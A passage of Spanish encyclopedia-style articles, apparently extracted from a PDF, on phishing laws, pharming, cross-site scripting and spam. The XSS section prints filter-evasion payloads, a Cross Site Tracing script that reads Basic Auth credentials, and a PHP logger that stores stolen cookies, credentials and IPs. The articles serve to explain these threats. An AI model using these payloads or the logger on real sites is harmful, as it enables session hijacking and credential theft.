contenido phishing.

Phishing El [www.apwg.org/ Anti-Phishing Working Group}, industria y asociacin que aplica la ley contra las prcticas de phishing, ha sugerido que las tcnicas convencionales de phishing podran ser obsoletas en un futuro a medida que la gente se oriente sobre los mtodos de ingeniera social utilizadas por los phishers.[25] Ellos suponen que en un futuro cercano, el pharming y otros usos de malware se van a convertir en herramientas ms comunes para el robo de informacin.

98

Respuestas legislativas y judiciales


El 26 de enero de 2004, la FTC (Federal Trade Commission, la Comisin Federal de Comercio) de Estados Unidos llev a juicio el primer caso contra un phisher sospechoso. El acusado, un adolescente de California, supuestamente cre y utiliz una pgina web con un diseo que aparentaba ser la pgina de America Online para poder robar nmeros de tarjetas de crdito.[26] Tanto Europa como Brasil siguieron la prctica de los Estados Unidos, rastreando y arrestando a presuntos phishers. A finales de marzo de 2005, un hombre estonio de 24 aos fue arrestado utilizando una backdoor, a partir de que las vctimas visitaron su sitio web falso, en el que inclua un keylogger que le permita monitorear lo que los usuarios tecleaban.[27] Del mismo modo, las autoridades arrestaron al denominado phisher kingpin, Valdir Paulo de Almeida, lder de una de las ms grandes redes de phishing que en dos aos haba robado entre $18 a $37 millones de dlares estadounidenses.[28] En junio del 2005 las autoridades del Reino Unido arrestaron a dos hombres por la prctica del phishing,[29] en un caso conectado a la denominada Operation Firewall del Servicio Secreto de los Estados Unidos, que buscaba sitios web notorios que practicaban el phishing.[30] La compaa Microsoft tambin se ha unido al esfuerzo de combatir el phishing. El 31 de marzo del 2005, Microsoft llev a la Corte del Distrito de Washington 117 pleitos federales. En algunos de ellos se acus al denominado phisher "John Doe" por utilizar varios mtodos para obtener contraseas e informacin confidencial. Microsoft espera desenmascarar con estos casos a varios operadores de phishing de gran envergadura. En marzo del 2005 tambin se consider la asociacin entre Microsoft y el gobierno de Australia para educar sobre mejoras a la ley que permitiran combatir varios crmenes cibernticos, incluyendo el phishing.[31]

El phishing como delito


General
Diversos pases se han ocupado de los temas del fraude y las estafas a travs de Internet. Uno de ellos es ell Convenio de Cibercriminalidad de Budapest [32] pero adems otros pases han dedicado esfuerzos legislativos para castigar estas acciones . Algunos pases ya han incluido el phishing como delito en sus legislaciones, mientras que en otros an estn trabajando en ello.

Argentina
En Argentina, el 19 de septiembre de 2011 fue presentado un proyecto para sancionar el Phishing [33], bajo el N de Expediente S-2257/11, Proyecto de Ley para tipificar el Phishing o Captacin Ilegtima de Datos [34] en el Senado de la Nacin. Mediante este proyecto se busca combatir las diferentes tcnicas de obtencin ilegtima de informacin personal.

Estados Unidos
En los Estados Unidos, el senador Patrick Leahy introdujo el Ley Anti-Phishing de 2005 el 1 de marzo de 2005. Esta ley federal de anti-phishing estableca que aquellos criminales que crearan pginas web falsas o enviaran spam a cuentas de correo electrnico con la intencin de estafar a los usuarios podran recibir una multa de hasta $250,000 USD y penas de crcel por un trmino de hasta cinco aos.[35]

Phishing Algunos estados tienen leyes que tratan las prcticas fraudulentas o engaosas o el robo de identidad y que tambin podra aplicarse a los delitos de phishing. Aqu [36] se puede encontrar los estados que actualmente castigan este tipo de delitos.

99

Referencias
[1] Tan, Koon. Phishing and Spamming via IM (SPIM).|Internet Storm Center. (http:/ / isc. sans. org/ diary. php?storyid=1905)/]. 5 de diciembre de 2010 [2] (http:/ / searchsecurity. techtarget. com/ tip/ 0,289483,sid14_gci1193304,00. html). Ed Skoudis. Phone phishing: The role of VoIP in phishing attacks. 13 de junio de 2006 [3] Suplantacin o robo de identidad (phishing)a (http:/ / www. ri5. com. ar/ ayudaphishing. php) [4] Stutz, Michael AOL: A Cracker's Paradise? (http:/ / wired-vig. wired. com/ news/ technology/ 0,1282,9932,00. html/ ) 29 de enero de 1998 [5] "phishing, n." OED Online, March 2006, Oxford University Press. Oxford English Dictionary Online. (http:/ / dictionary. oed. com/ cgi/ entry/ 30004304/ ). 9 de agosto de 2006 [6] "phish, v." OED Online, March 2006, Oxford University Press. Oxford English Dictionary Online. http:/ / dictionary. oed. com/ cgi/ entry/ 30004303/ 9 de agosto de 2006 [7] Ollmann, Gunter. Phishing Guide: Understanding and Preventing Phishing Attacks. Technical Info. (http:/ / www. technicalinfo. net/ papers/ Phishing. html). 10 de julio de 2006. [8] AOL: A Cracker's Paradise? (http:/ / wired-vig. wired. com/ news/ technology/ 0,1282,9932,00. html/ ). Michael Stutz. Wired News. 29 de enero de 1998 [9] History of AOL Warez (http:/ / www. rajuabju. com/ warezirc/ historyofaolwarez. htm). 28 de septiembre de 2006. [10] Phishing for Clues, Indiana University Bloomington (http:/ / www. browser-recon. info/ ), 15 de septiembre de 2005 (en ingls) [11] [http://www.pcworld.com/resource/article/0,aid,125956,pg,1,RSS,RSS,00.asp/ Phishing Scam Takes Aim at MySpace.com. Jeremy Kirk. IDG Network. 2 de junio de 2006 (en ingls) [12] Tom Jagatic and Nathan Johnson and Markus Jakobsson and Filippo Menczer. Social Phishing (http:/ / www. indiana. edu/ ~phishing/ social-network-experiment/ phishing-preprint. pdf/ ). A publicarse en Communications of the ACM. 3 de junio del 2006. (en ingls) [13] Malicious Website / Malicious Code: MySpace XSS QuickTime Worm (http:/ / www. websense. com/ securitylabs/ alerts/ alert. php?AlertID=708/ ). Websense Security Labs. 5 de diciembre de 2006. [14] Berners-Lee, Tim. Uniform Resource Locators (http:/ / www. w3. org/ Addressing/ rfc1738. txt/ ), IETF Network Working Group, 28 de enero de 2006 [15] Fisher, Darin. Warn when HTTP URL auth information isn't necessary or when it's provided (https:/ / bugzilla. mozilla. org/ show_bug. cgi?id=232567). Bugzilla. 28 de agosto de 2005 [16] Microsoft. A security update is available that modifies the default behavior of Internet Explorer for handling user information in HTTP and in HTTPS URLs (http:/ / support. microsoft. com/ kb/ 834489/ ) Microsoft Knowledgebase Database. 28 de agosto de 2005 [17] Evgeniy Gabrilovich and Alex Gontmakher. The Homograph Attack (http:/ / www. cs. technion. ac. il/ ~gabr/ papers/ homograph_full. pdf/ ).Communications of the ACM 45(2):128. febrero del 2002 [18] Johanson, Eric. The State of Homograph Attacks Rev1.1. (http:/ / www. cs. technion. ac. il/ ~gabr/ papers/ homograph_full. pdf/ ) 'The Shmoo Group. 11 de agosto de 2005. [19] Kerstein, Paul: How Can We Stop Phishing and Pharming Scams? (http:/ / www. csoonline. com/ talkback/ 071905. html/ ), CSO, 19 de julio de 2005. [21] Richardson, Tim: Brits fall prey to phishing (http:/ / www. theregister. co. uk/ 2005/ 05/ 03/ aol_phishing/ ), The Register, 3 de mayo de, 2005. [22] Bank, David: 'Spear Phishing' Tests Educate People About Online Scams (http:/ / online. wsj. com/ public/ article/ 0,,SB112424042313615131-z_8jLB2WkfcVtgdAWf6LRh733sg_20060817,00. html?mod=blogs/ ), The Wall Street Journal, 17 de agosto de 2005. [23] Security: Bank to Require More Than Passwords, (http:/ / www. cnn. com/ 2005/ TECH/ ptech/ 07/ 14/ banking. security. ap/ index. html/ ) CNN, July 14, 2005. [25] Kawamoto, Dawn: Faced with a rise in so-called pharming and crimeware attacks, the Anti-Phishing Working Group will expand its charter to include these emerging threats. (http:/ / www. zdnetindia. com/ news/ features/ stories/ 126569. html/ ), ZDNet India, 4 de agosto de 2005. [26] Legon, Jeordan: 'Phishing' scams reel in your identity (http:/ / www. cnn. com/ 2003/ TECH/ internet/ 07/ 21/ phishing. scam/ index. html/ ), CNN, 26 de enero de 2004. [27] Leyden, John: Trojan phishing suspect hauled in (http:/ / www. cnn. com/ 2003/ TECH/ internet/ 07/ 21/ phishing. scam/ index. html/ ), The Register, 4 de abril de 2005. [28] Leyden, John: Brazilian cops net 'phishing kingpin' (http:/ / www. channelregister. co. uk/ 2005/ 03/ 21/ brazil_phishing_arrest/ ), The Register, 21 de marzo de 2005. [29] UK Phishers Caught, Packed Away, (http:/ / www. eweek. com/ article2/ 0,1895,1831960,00. asp/ ) eWEEK, junio 27 de 2005. [30] Nineteen Individuals Indicted in Internet 'Carding' Conspiracy. (http:/ / www. cybercrime. gov/ mantovaniIndict. htm/ ) 20 de noviembre del 2005

Phishing
[31] Microsoft Partners with Australian Law Enforcement Agencies to Combat Cyber Crime. (http:/ / www. microsoft. com/ australia/ presspass/ news/ pressreleases/ cybercrime_31_3_05. aspx/ ) 24 de agosto del 2005. [32] http:/ / www. coe. int/ t/ dghl/ standardsetting/ t-cy/ ETS_185_spanish. PDF [33] Borghello Cristian, Temperini Marcelo Cruzada por la Identidad Digital (http:/ / cruzada. elderechoinformatico. com/ ) Marzo 2012. [34] http:/ / www. senado. gov. ar/ web/ proyectos/ verExpe. php?origen=S& numexp=2257/ 11& tipo=PL& tConsulta=1 [35] Phishers Would Face 5 Years Under New Bill, (http:/ / informationweek. com/ story/ showArticle. jhtml?articleID=60404811/ ) Information Week, 2 de marzo de 2005. [36] http:/ / www. ncsl. org/ issues-research/ telecom/ state-phishing-laws. aspx

100

Enlaces externos
Informacin sobre phishing
Grupo Activo Anti-Phishing (http://www.anti-phishing.org) (en ingls) Amenazas en la era digital - Informe sobre el Phishing y otras amenazas para las Entidades Financieras (http:// www.iberfinanzas.com/index.php/Articulos-informes/Amenazas-en-la-era-digital.html) INTECO, equipo que gestiona incidentes de phishing en Espaa (http://cert.inteco.es/Respuesta_y_Soporte/ Gestion_de_Fraude_Electronico/)

Legislacin
Duke Law & Technology Review (http://www.law.duke.edu/journals/dltr/articles/2005dltr0006.html) Tapando los agujeros provocados por el phishing: legislacin contra tecnologa.

Pharming
Pharming es la explotacin de una vulnerabilidad en el software de los servidores DNS (Domain Name System) o en el de los equipos de los propios usuarios, que permite a un atacante redirigir un nombre de dominio (domain name) a otra mquina distinta. De esta forma, un usuario que introduzca un determinado nombre de dominio que haya sido redirigido, acceder en su explorador de internet a la pgina web que el atacante haya especificado para ese nombre de dominio.

Origen de la palabra
La palabra pharming deriva del trmino farm (granja en ingls) y est relacionada con el trmino phishing, utilizado para nombrar la tcnica de ingeniera social que, mediante suplantacin de correos electrnicos o pginas web, intenta obtener informacin confidencial de los usuarios, desde nmeros de tarjetas de crdito hasta contraseas. El origen de la palabra se halla en que una vez que el atacante ha conseguido acceso a un servidor DNS o varios servidores (granja de servidores o DNS), se dice que ha hecho un pharming.

Pharming

101

Controversia en el uso del trmino


En una conferencia organizada por el Anti-Phishing Working Group, Phillip Hallam-Baker defini este trmino como "un neologismo de mercadotecnia diseado para convencer a banqueros y empresarios de comprar nuevos equipos o accesorios de seguridad".

Mtodo de funcionamiento del pharming


Todos los ordenadores conectados a internet tienen una direccin IP nica, que consiste en 4 octetos (4 grupos de 8 dgitos binarios) de 0 a 255 separados por un punto (ej: 127.0.0.1). Estas direcciones IP son comparables a las direcciones postales de las casas, o al nmero de los telfonos. Debido a la dificultad que supondra para los usuarios tener que recordar esas direcciones IP, surgieron los Nombres de Dominio, que van asociados a las direcciones IP del mismo modo que los nombres de las personas van asociados a sus nmeros de telfono en una gua telefnica. Los ataques mediante pharming pueden realizarse de dos formas: directamente a los servidores DNS, con lo que todos los usuarios se veran afectados, o bien atacando a ordenadores concretos, mediante la modificacin del fichero "hosts" presente en cualquier equipo que funcione bajo Microsoft Windows o sistemas Unix. La tcnica de pharming se utiliza normalmente para realizar ataques de phishing, redirigiendo el nombre de dominio de una entidad de confianza a una pgina web, en apariencia idntica, pero que en realidad ha sido creada por el atacante para obtener los datos privados del usuario, generalmente datos bancarios.

Casos reales de pharming


En julio de 2001, varios servidores ISP de Irlanda fueron atacados mediante pharming, y no se resolvi hasta pasados ms de 5 das. Muchas empresas irlandesas se vieron afectadas. El joven alicantino menor de edad que responda al nick DragonKing fue detenido ao y medio ms tarde. En enero de 2005, el nombre de dominio de un ISP de Nueva York, fue redirigido a un sitio web en Australia. Hushmail, un proveedor de Secure e-mail, fue atacado mediante pharming el 24 de abril de 2005. En marzo de 2005, el Senador Estadounidense Patrick Leahy introdujo un artculo de ley Anti-phishing, que propona una condena de cinco aos de prisin y una sancin econmica a los individuos que realizasen ataques de phishing o utilizasen informacin obtenida mediante fraude online como phishing y pharming.

Anti-Pharming
Anti-Pharming es el trmino usado para referirse a las tcnicas utilizadas para combatir el pharming. Algunos de los mtodos tradicionales para combatir el pharming son la utilizacin de software especializado, la proteccin DNS y el uso de addons para los exploradores web, como por ejemplo toolbars. El software especializado suele utilizarse en los servidores de grandes compaas para proteger a sus usuarios y empleados de posibles ataques de pharming y phishing, mientras que el uso de addons en los exploradores web permite a los usuarios domsticos protegerse de esta tcnica. La proteccin DNS permite evitar que los propios servidores DNS sean vulnerados para realizar ataques pharming. Los filtros anti-spam normalmente no protegen a los usuarios contra esta tcnica.

Pharming

102

Referencias
"El Pharming: amenaza de fraude a negocios" [1], Terra. "Fraude a travs del pharming", Microsoft (enlace roto disponible en Internet Archive; vase el historial [2] y la ltima versin [3]). "Pharming: Estafa sofisticada" [4], GigaBytes.cl.

Referencias
[1] [2] [3] [4] http:/ / www. mx. terra. com/ tecnologia/ interna/ 0,,OI889426-EI4906,00. html http:/ / web. archive. org/ web/ */ http:/ / www. microsoft. com/ spain/ athome/ security/ privacy/ pharming. mspx http:/ / web. archive. org/ web/ 2/ http:/ / www. microsoft. com/ spain/ athome/ security/ privacy/ pharming. mspx http:/ / www. gigabytes. cl/ culpharming. php

Cross-site scripting
XSS, del ingls Cross-site scripting es un tipo de inseguridad informtica o agujero de seguridad tpico de las aplicaciones Web, que permite a una tercera parte inyectar en pginas web vistas por el usuario cdigo JavaScript o en otro lenguaje script similar (ej: VBScript), evitando medidas de control como la Poltica del mismo origen. Este tipo de vulnerabilidad se conoce en espaol con el nombre de Secuencias de comandos en sitios cruzados.[1] Es posible encontrar una vulnerabilidad XSS en aplicaciones que tenga entre sus funciones presentar la informacin en un navegador web u otro contenedor de pginas web. Sin embargo, no se limita a sitios web disponibles en Internet, ya que puede haber aplicaciones locales vulnerables a XSS, o incluso el navegador en s. XSS es un vector de ataque que puede ser utilizado para robar informacin delicada, secuestrar sesiones de usuario, y comprometer el navegador, subyugando la integridad del sistema. Las vulnerabilidades XSS han existido desde los primeros das de la Web.[2] Esta situacin es usualmente causada al no validar correctamente los datos de entrada que son usados en cierta aplicacin, o no sanear la salida adecuadamente para su presentacin como pgina web. Esta vulnerabilidad puede estar presente de las siguientes formas: Directa (tambin llamada Persistente): este tipo de XSS comnmente filtrado, y consiste en embeber cdigo HTML peligroso en sitios que lo permitan; incluyendo as etiquetas como <script> o <iframe>. Indirecta (tambin llamada Reflejada): este tipo de XSS consiste en modificar valores que la aplicacin web utiliza para pasar variables entre dos pginas, sin usar sesiones y sucede cuando hay un mensaje o una ruta en la URL del navegador, en una cookie, o cualquier otra cabecera HTTP (en algunos navegadores y aplicaciones web, esto podra extenderse al DOM del navegador).

XSS Indirecto (reflejado)


Supongamos que un sitio web tiene la siguiente forma: http:/ / www. example. com/ home. asp?frame=menu. asp y que al acceder se crear un documento HTML enlazando con un frame a menu.asp. En este ejemplo, qu pasara si se pone como URL del frame un cdigo javascript? javascript:while(1)alert("Este mensaje saldra indefinidamente"); Si este enlace lo pone un atacante hacia una vctima, un visitante podr verlo y ver que es del mismo dominio, suponiendo que no puede ser nada malo y de resultado tendr un bucle infinito de mensajes.

Cross-site scripting Un atacante en realidad tratara de colocar un script que robe las cookies de la vctima, para despus poder personificarse como con su sesin, o hacer automtico el proceso con el uso de la biblioteca cURL o alguna similar. De esta forma, al recibir la cookie, el atacante podra ejecutar acciones con los permisos de la vctima sin siquiera necesitar su contrasea. Otro uso comn para estas vulnerabilidades es lograr hacer phishing. Quiere ello decir que la vctima ve en la barra de direcciones un sitio, pero realmente est en otra. La vctima introduce su contrasea y se la enva al atacante. Una pgina como la siguiente: error.php?error=Usuario%20Invalido es probablemente vulnerable a XSS indirecto, ya que si escribe en el documento "Usuario Invlido", esto significa que un atacante podra insertar HTML y JavaScript si as lo desea. Por ejemplo, un tag como <script> que ejecute cdigo javascript, cree otra sesin bajo otro usuario y mande la sesin actual al atacante. Para probar vulnerabilidades de XSS en cookies, se puede modificar el contenido de una cookie de forma sencilla, usando el siguiente script. Slo se debe colocar en la barra de direcciones, y presionar 'Enter'. javascript:void prompt("Introduce la cookie:",document.cookie).replace(/[^;]+/g,function(_){document.cookie=_;});

103

XSS Directo (persistente)


Funciona localizando puntos dbiles en la programacin de los filtros de HTML si es que existen, para publicar contenido (como blogs, foros, etc.). Normalmente el atacante tratara de insertar tags como <iframe>, o <script>, pero en caso de fallar, el atacante puede tratar de poner tags que casi siempre estn permitidas y es poco conocida su capacidad de ejecutar cdigo. De esta forma el atacante podra ejecutar cdigo malicioso. Ejemplos: Una posibilidad es usar atributos que permiten ejecutar cdigo. <BR SIZE="&{alert('XSS')}"> <FK STYLE="behavior: url(http://yoursite/xss.htc);"> <DIV STYLE="background-image: url(javascript:alert('XSS'))"> Tambin se puede crear un DIV con background-image: url(javascript:eval(this.fu)) como estilo y aadir al DIV un campo llamado fu que contenga el cdigo a ejecutar, por ejemplo:
<div fu="alert('Hola mundo');" STYLE="background-image: url(javascript:eval(this.fu))">

Cross-site scripting

104

AJAX
Usar AJAX para ataques de XSS no es tan conocido, pero s peligroso. Se basa en usar cualquier tipo de vulnerabilidad de XSS para introducir un objeto XMLHttp y usarlo para enviar contenido POST, GET, sin conocimiento del usuario. Este se ha popularizado con gusanos de XSS que se encargan de replicarse por medio de vulnerabilidades de XSS persistentes (aunque la posibilidad de usar XSS reflejados es posible). El siguiente script de ejemplo obtiene el valor de las cabeceras de autenticacin de un sistema basado en Autenticacin Bsica (Basic Auth). Slo falta decodificarlo, pero es ms fcil mandarlo codificado al registro de contraseas. La codificacin es base64. Script para obtener credenciales en tipo BASIC Esta tcnica tambin es llamada XST, Cross Site Tracing. var xmlhttp=new ActiveXObject("Microsoft.XMLHTTP"); // para firefox, es: var xmlhttp = new XMLHttpRequest(); xmlhttp.open("TRACE","./",false); xmlhttp.send(null); str1=xmlhttp.responseText; splitString = str1.split("Authorization: Basic "); str2=splitString[1]; str3=str2.match(/.*/)[0]; alert(str3); Por cuestiones de seguridad, Mozilla Firefox y el Internet Explorer 6.2+ no permiten usar el metodo TRACE. Y este cdigo guardara un log con las cookies que enviara el atacante. <?php $archivo = fopen('log2.htm','a'); $cookie = $_GET['c']; $usuario = $_GET['id']; $ip = getenv ('REMOTE_ADDR'); $re = $HTTPREFERRER; $fecha=date("j F, Y, g:i a");

Cross-site scripting fwrite($archivo, '<hr>USUARIO Y PASSWORD: '.htmlentities(base64_decode($usuario))); fwrite($archivo, '<br />Cookie: '.htmlentities($cookie).'<br />Pagina: '.htmlentities($re)); fwrite($archivo, '<br /> IP: ' .$ip. '<br /> Fecha y Hora: ' .$fecha. '</hr>'); fclose($archivo); ?>

105

Enlaces externos
XSS FAQ [3] Ejemplo completo (SOAagenda.com) [4] JaSiLDBG [5] XSS Cheat Sheet [6] Ejemplo de problemas generados por una vulnerabilidad de XSS [7] Filtro anti-XSS para aplicaciones web basadas en Java [8]

Notas y referencias
[1] [3] [4] [5] [6] [7] [8] INTECO: Tipos de Vulnerabilidades http:/ / cert. inteco. es/ Formacion/ Amenazas/ Vulnerabilidades/ Tipos_Vulnerabilidades/ http:/ / www. cgisecurity. com/ articles/ xss-faq. shtml http:/ / soaagenda. com/ journal/ articulos/ cross-site-scripting/ http:/ / jasildbg. googlepages. com/ http:/ / ha. ckers. org/ xss. html http:/ / www. hacktimes. com/ robo_de_sesiones_http_mediante_xss/ http:/ / ricardozuasti. com/ 2012/ stronger-anti-cross-site-scripting-xss-filter-for-java-web-apps/

Spam

106

Spam
Se llama spam, correo basura o mensaje basura a los mensajes no solicitados, no deseados o de remitente no conocido (correo annimo), habitualmente de tipo publicitario, generalmente enviados en grandes cantidades (incluso masivas) que perjudican de alguna o varias maneras al receptor. La accin de enviar dichos mensajes se denomina spamming. La palabra spam proviene de la segunda guerra mundial, cuando los familiares de los Una carpeta KMail llena de correos no deseados recibidos en un corto perodo. soldados en guerra les enviaban comida enlatada; entre estas comidas enlatadas estaba una carne enlatada llamada spam, que en los Estados Unidos era y sigue siendo muy comn.[1][2] Aunque se puede hacer spam por distintas vas, la ms utilizada entre el pblico en general es la basada en el correo electrnico. Otras tecnologas de Internet que han sido objeto de correo basura incluyen grupos de noticias, usenet, motores de bsqueda, redes sociales, pginas web wiki, foros, web logs (blogs), a travs de ventanas emergentes y todo tipo de imgenes y textos en la web. El correo basura tambin puede tener como objetivo los telfonos mviles (a travs de mensajes de texto) y los sistemas de mensajera instantnea como por ejemplo Outlook, Lotus Notes,Windows live ,etc. Tambin se llama correo no deseado a los virus sueltos en la red y pginas filtradas (casino, sorteos, premios, viajes, drogas, software y pornografa), se activa mediante el ingreso a pginas de comunidades o grupos o acceder a enlaces en diversas pginas o inclusive sin antes acceder a ningn tipo de pginas de publicidad. De todas formas, el spam ha tomado una resemantizacin dentro del contexto de foros, siendo considerado spam cuando un usuario publica algo que desvirta o no tiene nada que ver con el tema de conversacin.[3] Tambin, en algunos casos, un mensaje que no contribuye de ninguna forma al tema es considerado spam. Una tercera forma de Spamming en foros es cuando una persona publica repetidamente mensajes acerca de un tema en particular en una forma indeseable (y probablemente molesta) para la mayor parte del foro. Finalmente, tambin existe el caso en que una persona publique mensajes nicamente con el fin de incrementar su rango, nivel o nmero de mensajes en el foro.

Historia
El correo basura mediante el servicio de correo electrnico naci el 5 de marzo de 1994. Este da una firma de abogados, Canter and Siegel, publica en Usenet un mensaje de anuncio de su firma legal; el da despus de la publicacin, factur cerca de 10.000 dlares por casos de sus amigos y lectores de la red. Desde ese entonces, el marketing mediante correo electrnico ha crecido a niveles impensados desde su creacin. Aunque existen otras versiones que datan su origen el 3 de mayo de 1978, cuando 393 empleados de ARPANET, el predecesor de Internet gestionado por el gobierno estadounidense, reciban con sorpresa un correo de la compaa de ordenadores DEC invitndoles al lanzamiento de un nuevo producto.[4] El correo basura por medio del fax (spam-fax), es otra de las categoras de esta tcnica de marketing directo, y consiste en enviar faxes masivos y no solicitados a travs de sistemas electrnicos automatizados hacia miles de personas o empresas cuya informacin ha sido cargada en bases de datos segmentadas segn diferentes variables.

Spam

107

Historia del trmino


La palabra spam tiene races estadounidenses. La empresa charcutera estadounidense Hormel Foods lanz en 1937 una carne en lata originalmente llamada Hormel's Spiced Ham.[] El Spam (de la contraccin de "Spiced Ham", en espaol "jamn con especias") fue el alimento de los soldados soviticos y britnicos en la Segunda Guerra Mundial, y desde 1957 fue comercializado en latas que ahorraban al consumidor el uso del abrelatas. Ms adelante, el grupo britnico Monty Python empez a hacer burla de la carne en lata. En un sketch de su programa Monty Python's Flying Circus,[5] cuando una pareja intentaba pedir comida en una cafetera, se encontraba con que todos los platos del men contenan spam: Huevos con tocino; huevos, salchicha y tocino; huevos con Lata de spam. spam; huevos, salchicha, tocino y spam; spam, tocino, salchichas y spam; spam, huevos, spam, spam y as sucesivamente. Un grupo de vikingos (la mayor productora de Spam en Europa era una compaa danesa) cantaba, sin motivo aparente: Spam, spam, spam, querido spam, maravilloso spam.[] Aos despus, cuando Internet comenzaba a crecer, algunos usuarios inexpertos mandaban errneamente mensajes personales a toda una lista de correo electrnico o a grupos de discusin que podan involucrar a varios cientos de personas lo que ocasionaba molestias y prdida de tiempo (y hasta de dinero) a los dems usuarios que reciban ese trfico irrelevante y no deseado. Segn Brad Templeton,[6] hacia 1993 alguien calific esas intromisiones no deseadas como spam: los mensajes eran como el spam del sketch, en el que nada se poda comer sin toparse con el fiambre.[]

Correo masivo en diferentes medios


Spam en los blogs
Es una tcnica de correo basura relativamente nueva, que surge con el auge de los blogs. Consiste en dejar un comentario en una entrada, que por lo general no tiene nada que ver con la misma sino que tiene enlaces a sitios comerciales, o promociona algn producto. El Akismet,[7] es un complemento para WordPress que detecta automticamente los comentarios con tendencia a ser correo masivo.

Spam en el correo electrnico


El correo masivo supone actualmente la mayor parte de los mensajes electrnicos intercambiados en Internet, siendo utilizado para anunciar productos y servicios de dudosa calidad. Rolex, eBay y viagra son los asuntos de los mensajes que compiten por el primer lugar en las clasificaciones de spam.[8][9][10][11][12] Usualmente los mensajes indican como remitente del correo una direccin falsa. Por esta razn, no sirve de nada contestar a los mensajes de spam: las respuestas sern recibidas por usuarios que nada tienen que ver con ellos. Por ahora, el servicio de correo electrnico no puede identificar los mensajes de forma que se pueda discriminar la verdadera direccin de correo electrnico del remitente, de una falsa. Esta situacin que puede resultar chocante en un primer momento, es semejante por ejemplo a la que ocurre con el correo postal ordinario: nada impide poner en una carta o postal una direccin de remitente aleatoria: el correo llegar en cualquier caso. No obstante, hay tecnologas desarrolladas en esta direccin: por ejemplo el remitente puede firmar sus mensajes mediante criptografa de clave pblica.

Spam Los filtros automticos antispam analizan el contenido de los mensajes buscando, por ejemplo, palabras como rolex, viagra, y sex que son las ms usuales en los mensajes no deseados. No se recomienda utilizar estas palabras en la correspondencia por correo electrnico: el mensaje podra ser calificado como no deseado por los sistemas automticos anti correo masivo.[citarequerida]

108

Spam en foros
El spam, dentro del contexto de foros, es cuando un usuario publica algo que desvirta o no tiene nada que ver con el tema de conversacin.[13] Tambin, en algunos casos, un mensaje que no contribuye de ninguna forma al tema es considerado spam. Una tercera forma de Spamming en foros es cuando una persona publica repetidamente mensajes acerca de un tema en particular en una forma indeseable (y probablemente molesta) para la mayor parte del foro. Finalmente, tambin existe el caso en que una persona publique mensajes nicamente con el fin de incrementar su rango, nivel o nmero de mensajes en el foro. El spam en un foro de Internet tambin se produce cuando un usuario pblica comentarios que contienen enlaces o algn tipo de referencia hacia algn sitio web o foro similar, de igual contenido, o incluso ajeno al mismo, as como cualquier otro objetivo tpico de publicidad, con el objetivo de atraer ms usuarios y visitantes al mismo. ltimamente se estn abriendo hilos especiales dedicados al spam, para que los usuarios que quieran postear no ralenticen los dems hilos. Estos hilos dedicados al spam han cobrado verdadera importancia y resultan muy usados, tanto es as que algunos foros despus de tenerlos largo tiempo decidieron eliminarlos debido al hecho de que en muchas ocasiones estos subforos o temas eran muchos ms usados que el resto de partes del foro principal, es decir, mientras que en spam se posteaban ms de 50 mensajes diarios, en algunos casos, en el resto de apartados apenas se lograban 2 3 publicaciones. De aqu, se han despertado nuevos movimientos, que han desarrollado comunidades en lnea dedicadas 100% al spam, como spamloco, spamfestuy y espamearte, entre los ms aejos.

Spam en las redes sociales


Es una nueva forma de correo basura que consiste en enviar publicidad, ofertas de empleo, publicidad directamente a los usuarios de redes sociales profesionales sin que stos lo hayan solicitado o en los foros de la red social. Dos ejemplos de correo no deseado corporativo en este sector son el envo de invitaciones no solicitadas a los contactos de usuarios de Facebook, y la "respuesta automtica" con publicidad que aleatoriamente se hace desde MSN Hotmail cuando alguien enva un mensaje a un buzn de dicha corporacin.
Tambien es muy normal encontar el 'spam en twitter cuando los fans locos acosan a sus idolos.

Spam en redes de IRC


Tan antiguo como el propio protocolo de IRC, el correo basura en redes de charlas en lnea toma auge a raz de la masificacin de dicho medio de comunicacin. Los mensajes no deseados en redes de IRC tiene un coste irrisorio y por lo tanto son objetivo principal de redes de distribucin de contenidos. Los mensajes ms habituales suelen tener por objetivo la visita de otros canales de chat, la visita de webs y la difusin en general de contenidos de pago. Recientemente se constata la aparicin de una nueva modalidad de spam que busca que el usuario perceptor de la publicidad use la telefona mvil para contratar servicios de elevado coste. Esta prctica esta penada por la Ley. En muchas ocasiones esta actividad es realizada por robots bajo seudnimos atractivos para llamar la atencin del usuario. Son habituales los nombres como 'joven_guapa' o 'busco_amor'.

Spam

109

Spam en correo postal


La tcnicas de bombardeo publicitario han llegado tambin a los medios convencionales de comunicacin. La enorme bajada relativa de los costes de impresin en papel, desde un folletos de una sola pgina hasta un catlogo publicitario de varias decenas han hecho que tambin el envo de correo no solicitado llegue por medio de correo postal. De forma anloga a como ocurre en los medios electrnicos, donde un usuario interesado en un producto que remite sus datos a una empresa puede verse bombardeado por publicidad no deseada de esa u otra empresa, hay empresas especializadas en el buzoneo masivo e indiscriminado de publicidad. Es habitual encontrar en el buzn postal, publicidad no solicitada introducida masivamente por empresas especializadas o por los propios distribuidores finales. Estas acceden a los buzones tanto en la va pblica as como buzones situados en zonas privativas.

Spam en la va pblica
En la va pblica son tambin comunes las prcticas de spam, sobre todo en las ciudades. La colocacin de publicidad en lugares no preparados para ello supone un grave deterioro del medio urbano: paredes, postes, vehculos son invadidos por publicidad no solicitada que no en pocos casos acaba en el suelo. Las corporaciones municipales pierden mucho dinero por estas prcticas ilegales exentas de control fiscal y adems invierten grandes cantidades de dinero en la retirada y limpieza del material publicitario dispersado en el medio. En los ltimos aos se ha extendido el llamado "pegatinazo", prctica consistente en colocar pegatinas con publicidad sobre el mobiliario urbano y las edificaciones (servicios de cerrajera, fontanera y electricidad son los ms comunes) utilizando pegatinas con adhesivos muy potentes y que se rompen si se intentan retirar dificultando y encareciendo su retirada.[citarequerida]

Spam en los Wikis


En los Wikis, los usuarios frecuentan a hacer Spam en las discusiones de otros usuarios, blogs (tanto crearlos como comentarlos) o en comentarios en la pgina de discusin de un artculo. Principalmente esto se trata de vandalismo, pero algunas veces los usuarios estn pidiendo ayuda para que otro Wiki progrese. La mala intencin no aparece siempre, como ven, pero no deja de ser molesto para los dems.

Tcnicas de spam
Obtencin de direcciones de correo
